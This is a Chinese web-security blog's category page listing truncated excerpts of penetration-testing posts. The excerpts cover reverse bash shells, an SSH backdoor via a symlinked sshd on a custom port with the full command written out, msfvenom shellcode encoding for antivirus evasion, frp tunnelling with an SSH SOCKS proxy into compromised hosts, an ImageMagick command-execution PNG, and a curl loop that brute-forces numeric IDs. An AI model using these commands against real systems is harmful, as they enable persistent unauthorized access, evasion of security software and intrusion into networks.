分类 Web安全与渗透下的文章

NC，bash反弹后非标准终端使用注意

一般在渗透过程中会反弹一个bash shell，但是此类反弹，命令行终端非正规的终端，键盘上下翻动无历史记录，vim编辑文件的时候，可能就会over。因为反弹出来的shell没有Sigint的，如果Ctrl+C，反弹出来的shell就...

通过软连接建立一个ssh后门：ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345说明：建立软连接到/usr/local/su 文件，也可以在其他目录，su文件名...

之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了，奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊.... 不废话了，直接还是shellcode生成，继续过AV。msfvenom ...

#被入侵机器用frpc打洞，一个字稳！！！！本地再使用ssh代理到frps， ssh -qtfnN -D 127.0.0.1:1088 root@frps_ip -p -i 证书使用就直接配置一下 proxychains 为so...

请输入密码访问

1.下列内容保存为png，即可（touch 1.png &&vi 1.png）之后执行convert 1.png 1.gif之后你就会看到，执行了 >$ id(如果ubuntu测试的时候没有，可以手动安装imag...

for i in 1580000{1000..9999};do curl -H"xxxxxx" -H "xxxxxxxx" -H "Accept: */*" -H "X-Requested-With: XMLHttpRequest" ...